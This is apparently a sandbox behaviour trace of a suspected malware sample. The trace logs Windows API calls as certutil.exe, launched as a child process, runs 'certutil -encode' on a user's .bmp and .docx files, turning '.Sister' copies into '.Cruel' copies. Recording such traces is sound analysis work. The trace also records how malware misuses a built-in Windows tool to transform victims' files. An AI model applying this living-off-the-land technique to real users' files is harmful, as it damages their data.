dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0303.480] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0303.480] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0303.480] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0303.480] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x210368100f0 [0303.480] GetComputerNameW (in: lpBuffer=0x210368100f0, nSize=0xa0bce8f690 | out: lpBuffer="NQDPDE", nSize=0xa0bce8f690) returned 1 [0303.480] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xa0bce8f660 | out: lpBuffer=0x0, nSize=0xa0bce8f660) returned 0 [0303.481] GetLastError () returned 0xea [0303.481] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x210367fba60 [0303.481] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x210367fba60, nSize=0xa0bce8f660 | out: lpBuffer="NQdPdE", nSize=0xa0bce8f660) returned 1 [0303.481] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0303.485] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x21036810310, cbCertEncoded=0x115d2) returned 0x0 [0303.491] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x21036810310, cbCrlEncoded=0x115d2) returned 0x0 [0303.493] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x21036810310, cbEncoded=0x115d2, dwFlags=0x8000, pDecodePara=0xa0bce8f540, pvStructInfo=0xa0bce8f5d0, pcbStructInfo=0xa0bce8f5c4 | out: pvStructInfo=0xa0bce8f5d0, pcbStructInfo=0xa0bce8f5c4) returned 0 [0303.493] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x21036810310, cbEncoded=0x115d2, dwFlags=0x8000, pDecodePara=0xa0bce8f540, pvStructInfo=0xa0bce8f5d0, pcbStructInfo=0xa0bce8f5c4 | out: pvStructInfo=0xa0bce8f5d0, pcbStructInfo=0xa0bce8f5c4) returned 0 [0303.493] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x21036810310, cbEncoded=0x115d2, dwFlags=0x8000, pDecodePara=0xa0bce8f540, pvStructInfo=0xa0bce8f5d0, pcbStructInfo=0xa0bce8f5c4 | out: pvStructInfo=0xa0bce8f5d0, pcbStructInfo=0xa0bce8f5c4) returned 0 [0303.494] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2103680ba20 [0303.504] CryptMsgUpdate (hCryptMsg=0x2103680ba20, pbData=0x21036810310, cbData=0x115d2, fFinal=1) returned 0 [0303.504] GetLastError () returned 0x8009310b [0303.504] CryptMsgClose (hCryptMsg=0x2103680ba20) returned 1 [0303.504] GetFileAttributesExW (in: lpFileName="v9e3P.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\v9e3p.bmp.sister"), fInfoLevelId=0x0, lpFileInformation=0xa0bce8f5f0 | out: lpFileInformation=0xa0bce8f5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2)) returned 1 [0303.504] _vsnwprintf (in: _Buffer=0xa0bce8f5f8, _BufferCount=0xb, _Format="%d", _ArgList=0xa0bce8f5e8 | out: _Buffer="359") returned 3 [0303.504] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xa0bce8f3b0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0303.504] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x210368102a0 [0303.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.504] _vsnwprintf (in: _Buffer=0xa0bce8e5e0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xa0bce8f638 | out: _Buffer="Input Length = 71122") returned 20 [0303.505] GetFileType (hFile=0x50) returned 0x2 [0303.505] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa0bce8e5e0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xa0bce8e594, lpReserved=0x0 | out: lpBuffer=0xa0bce8e5e0*, lpNumberOfCharsWritten=0xa0bce8e594*=0x14) returned 1 [0303.507] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.507] _vsnwprintf (in: _Buffer=0xa0bce8e5e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa0bce8f638 | out: _Buffer="\n") returned 1 [0303.507] GetFileType (hFile=0x50) returned 0x2 [0303.507] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa0bce8e5e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa0bce8e594, lpReserved=0x0 | out: lpBuffer=0xa0bce8e5e0*, lpNumberOfCharsWritten=0xa0bce8e594*=0x1) returned 1 [0303.531] GetFileAttributesExW (in: lpFileName="v9e3P.bmp.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\v9e3p.bmp.cruel"), fInfoLevelId=0x0, lpFileInformation=0xa0bce8f5f0 | out: lpFileInformation=0xa0bce8f5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf857b42, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdf857b42, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdf87031e, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x17e3c)) returned 1 [0303.531] _vsnwprintf (in: _Buffer=0xa0bce8f5f8, _BufferCount=0xb, _Format="%d", _ArgList=0xa0bce8f5e8 | out: _Buffer="361") returned 3 [0303.531] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xa0bce8f3b0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0303.531] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x21036810240 [0303.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.531] _vsnwprintf (in: _Buffer=0xa0bce8e5e0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xa0bce8f638 | out: _Buffer="Output Length = 97852") returned 21 [0303.531] GetFileType (hFile=0x50) returned 0x2 [0303.531] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa0bce8e5e0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xa0bce8e594, lpReserved=0x0 | out: lpBuffer=0xa0bce8e5e0*, lpNumberOfCharsWritten=0xa0bce8e594*=0x15) returned 1 [0303.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.533] _vsnwprintf (in: _Buffer=0xa0bce8e5e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa0bce8f638 | out: _Buffer="\n") returned 1 [0303.533] GetFileType (hFile=0x50) returned 0x2 [0303.533] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa0bce8e5e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa0bce8e594, lpReserved=0x0 | out: lpBuffer=0xa0bce8e5e0*, lpNumberOfCharsWritten=0xa0bce8e594*=0x1) returned 1 [0303.538] LocalFree (hMem=0x21036810310) returned 0x0 [0303.538] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0303.538] _vsnwprintf (in: _Buffer=0xa0bce8f658, _BufferCount=0xb, _Format="%d", _ArgList=0xa0bce8f648 | out: _Buffer="2022") returned 4 [0303.538] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xa0bce8f410, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0303.538] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x210367e8a90 [0303.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.538] _vsnwprintf (in: _Buffer=0xa0bce8e640, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xa0bce8f698 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0303.538] GetFileType (hFile=0x50) returned 0x2 [0303.539] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa0bce8e640*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xa0bce8e5f4, lpReserved=0x0 | out: lpBuffer=0xa0bce8e640*, lpNumberOfCharsWritten=0xa0bce8e5f4*=0x31) returned 1 [0303.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.539] _vsnwprintf (in: _Buffer=0xa0bce8e640, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa0bce8f698 | out: _Buffer="\n") returned 1 [0303.539] GetFileType (hFile=0x50) returned 0x2 [0303.539] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa0bce8e640*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa0bce8e5f4, lpReserved=0x0 | out: lpBuffer=0xa0bce8e640*, lpNumberOfCharsWritten=0xa0bce8e5f4*=0x1) returned 1 [0303.548] LocalFree (hMem=0x0) returned 0x0 [0303.548] LocalFree (hMem=0x210367f0cb0) returned 0x0 [0303.548] LocalFree (hMem=0x210367f5460) returned 0x0 [0303.548] SetLastError (dwErrCode=0x80070716) [0303.548] _vsnwprintf (in: _Buffer=0xa0bce8f6c8, _BufferCount=0xb, _Format="%d", _ArgList=0xa0bce8f6b8 | out: _Buffer="511") returned 3 [0303.548] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xa0bce8f480, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0303.548] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2103680fe80 [0303.548] PostQuitMessage (nExitCode=0) [0303.548] GetMessageW (in: lpMsg=0xa0bce8fcc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa0bce8fcc0) returned 0 [0303.548] LocalFree (hMem=0x210367fba60) returned 0x0 [0303.548] LocalFree (hMem=0x210368100f0) returned 0x0 [0303.549] LocalFree (hMem=0x0) returned 0x0 [0303.549] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0303.549] GetLastError () returned 0x7e [0303.550] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0303.550] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0303.550] DllMain () returned 0x1 [0303.550] LocalFree (hMem=0x210367fb440) returned 0x0 [0303.550] LocalFree (hMem=0x210367eba60) returned 0x0 [0303.550] LocalFree (hMem=0x210368102a0) returned 0x0 [0303.550] LocalFree (hMem=0x21036810240) returned 0x0 [0303.550] LocalFree (hMem=0x210367e8a90) returned 0x0 [0303.550] LocalFree (hMem=0x2103680fe80) returned 0x0 [0303.550] LocalFree (hMem=0x210367f4480) returned 0x0 [0303.550] LocalFree (hMem=0x210367eb9a0) returned 0x0 [0303.550] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0303.550] GetLastError () returned 0x7e [0303.551] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0303.551] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0303.551] DllMain () returned 0x1 [0303.551] exit (_Code=0) Thread: id = 138 os_tid = 0x1344 Process: id = "56" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1e36e000" os_pid = "0x1038" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 139 os_tid = 0x1050 [0307.198] GetStartupInfoW (in: lpStartupInfo=0x1ef159f750 | out: lpStartupInfo=0x1ef159f750*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0307.199] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0307.200] __set_app_type (_Type=0x1) [0307.200] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0307.200] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0307.203] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0307.203] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0307.204] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0307.204] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0307.204] WerSetFlags () returned 0x0 [0307.204] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0307.205] __iob_func () returned 0x7ffcea2dea00 [0307.205] _fileno (_File=0x7ffcea2dea30) returned 1 [0307.205] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0307.205] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0307.206] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0307.207] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0307.207] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0307.207] GetConsoleOutputCP () returned 0x1b5 [0307.208] _vsnwprintf (in: _Buffer=0x1ef159f6c0, _BufferCount=0xb, _Format=".%d", _ArgList=0x1ef159f5e8 | out: _Buffer=".437") returned 4 [0307.208] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0307.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.208] GetFileType (hFile=0x50) returned 0x2 [0307.208] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0307.209] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0307.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0307.209] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0307.209] GetCommandLineW () returned="certutil -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\"" [0307.209] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1378df9b5d0 [0307.210] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1378df8ad00 [0307.210] LocalFree (hMem=0x1378df9b5d0) returned 0x0 [0307.210] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1378df93dd0 [0307.210] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1378df93bc0 [0307.210] LocalFree (hMem=0x1378df93dd0) returned 0x0 [0307.210] LocalFree (hMem=0x1378df8ad00) returned 0x0 [0307.210] LocalFree (hMem=0x0) returned 0x0 [0307.210] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0307.210] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0307.211] GetCommandLineW () returned="certutil -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\"" [0307.211] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1378df9b930 [0307.211] GetSystemTime (in: lpSystemTime=0x1ef159f3b0 | out: lpSystemTime=0x1ef159f3b0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x15, wMilliseconds=0x2ef)) [0307.211] SystemTimeToFileTime (in: lpSystemTime=0x1ef159f3b0, lpFileTime=0x1ef159f3a8 | out: lpFileTime=0x1ef159f3a8) returned 1 [0307.211] FileTimeToLocalFileTime (in: lpFileTime=0x1ef159f3a8, lpLocalFileTime=0x1ef159f370 | out: lpLocalFileTime=0x1ef159f370) returned 1 [0307.211] FileTimeToSystemTime (in: lpFileTime=0x1ef159f370, lpSystemTime=0x1ef159f0e0 | out: lpSystemTime=0x1ef159f0e0) returned 1 [0307.211] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x1ef159f0e0, lpFormat=0x0, lpDateStr=0x1ef159f1f0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0307.211] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x1ef159f0e0, lpFormat=0x0, lpTimeStr=0x1ef159f0f0, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0307.212] _vsnwprintf (in: _Buffer=0x1ef159f0fe, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x1ef159f0c8 | out: _Buffer=" 21.751s") returned 8 [0307.212] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1378df9e170 [0307.212] SetLastError (dwErrCode=0x80070716) [0307.212] _vsnwprintf (in: _Buffer=0x1ef159f178, _BufferCount=0xb, _Format="%d", _ArgList=0x1ef159f168 | out: _Buffer="948") returned 3 [0307.212] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x1ef159ef30, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0307.212] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1378df9b690 [0307.212] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1378df94350 [0307.212] LocalFree (hMem=0x1378df9e170) returned 0x0 [0307.212] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef159f420 | out: lpSystemTimeAsFileTime=0x1ef159f420*(dwLowDateTime=0xe1b8b02b, dwHighDateTime=0x1d6141f)) [0307.212] GetLocalTime (in: lpSystemTime=0x1ef159f458 | out: lpSystemTime=0x1ef159f458*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x15, wMilliseconds=0x2f0)) [0307.212] SystemTimeToFileTime (in: lpSystemTime=0x1ef159f458, lpFileTime=0x1ef159f430 | out: lpFileTime=0x1ef159f430) returned 1 [0307.212] CompareFileTime (lpFileTime1=0x1ef159f430, lpFileTime2=0x1ef159f420) returned 1 [0307.213] _vsnwprintf (in: _Buffer=0x1ef159f468, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x1ef159f3f8 | out: _Buffer="GMT + 2.00") returned 10 [0307.213] LocalFree (hMem=0x1378df9b930) returned 0x0 [0307.213] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0307.213] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0307.213] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0307.213] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0307.213] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0307.213] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x1ef159f498 | out: _Buffer="10.0.15063.447") returned 14 [0307.213] GetACP () returned 0x4e4 [0307.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0307.213] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1378df9b990 [0307.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1378df9b990, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0307.213] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1378df9e070 [0307.214] _vsnwprintf (in: _Buffer=0x1378df9e070, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x1ef159f4e8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0307.214] LocalFree (hMem=0x1378df9b990) returned 0x0 [0307.214] LocalFree (hMem=0x0) returned 0x0 [0307.214] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0307.214] GetACP () returned 0x4e4 [0307.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0307.214] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1378df9b630 [0307.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1378df9b630, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0307.214] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1378df9def0 [0307.214] _vsnwprintf (in: _Buffer=0x1378df9def0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x1ef159f4e8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0307.214] LocalFree (hMem=0x1378df9b630) returned 0x0 [0307.214] LocalFree (hMem=0x0) returned 0x0 [0307.214] GetACP () returned 0x4e4 [0307.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0307.214] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1378df9b6b0 [0307.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1378df9b6b0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0307.214] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1378df9df30 [0307.214] _vsnwprintf (in: _Buffer=0x1378df9df30, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x1ef159f518 | out: _Buffer="10.0.15063.447 retail") returned 21 [0307.214] LocalFree (hMem=0x1378df9b6b0) returned 0x0 [0307.214] LocalFree (hMem=0x1378df9e070) returned 0x0 [0307.215] LocalFree (hMem=0x1378df9def0) returned 0x0 [0307.215] LocalFree (hMem=0x1378df9df30) returned 0x0 [0307.215] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0307.215] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0307.215] GetStockObject (i=0) returned 0x900010 [0307.215] RegisterClassW (lpWndClass=0x1ef159f640) returned 0xc1a2 [0307.215] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2c02c8 [0307.236] NtdllDefWindowProc_W () returned 0x0 [0307.237] NtdllDefWindowProc_W () returned 0x1 [0307.244] NtdllDefWindowProc_W () returned 0x0 [0307.318] UpdateWindow (hWnd=0x2c02c8) returned 1 [0307.318] PostMessageW (hWnd=0x2c02c8, Msg=0x400, wParam=0x0, lParam=0x1378df8217e) returned 1 [0307.318] GetMessageW (in: lpMsg=0x1ef159f690, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1ef159f690) returned 1 [0307.318] TranslateMessage (lpMsg=0x1ef159f690) returned 0 [0307.318] DispatchMessageW (lpMsg=0x1ef159f690) returned 0x0 [0307.318] NtdllDefWindowProc_W () returned 0x0 [0307.318] GetMessageW (in: lpMsg=0x1ef159f690, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x1ef159f690) returned 1 [0307.318] TranslateMessage (lpMsg=0x1ef159f690) returned 0 [0307.318] DispatchMessageW (lpMsg=0x1ef159f690) returned 0x0 [0307.318] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x1378df90b80 [0307.319] LocalAlloc (uFlags=0x0, uBytes=0xaa) returned 0x1378df8cf70 [0307.319] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0307.319] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0307.319] SetLastError (dwErrCode=0x80070716) [0307.319] _vsnwprintf (in: _Buffer=0x1ef159f098, _BufferCount=0xb, _Format="%d", _ArgList=0x1ef159f088 | out: _Buffer="465") returned 3 [0307.319] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x1ef159ee50, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0307.319] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1378df942e0 [0307.319] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0307.320] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0307.320] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x1ef159ee30, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0307.320] GetLastError () returned 0xcb [0307.320] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0307.320] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0307.320] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0307.320] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0307.320] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0307.320] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0307.320] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0307.320] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0307.320] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0307.320] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0307.320] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0307.320] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0307.320] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0307.320] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0307.321] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0307.321] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0307.321] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0307.321] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0307.321] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0307.321] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0307.321] 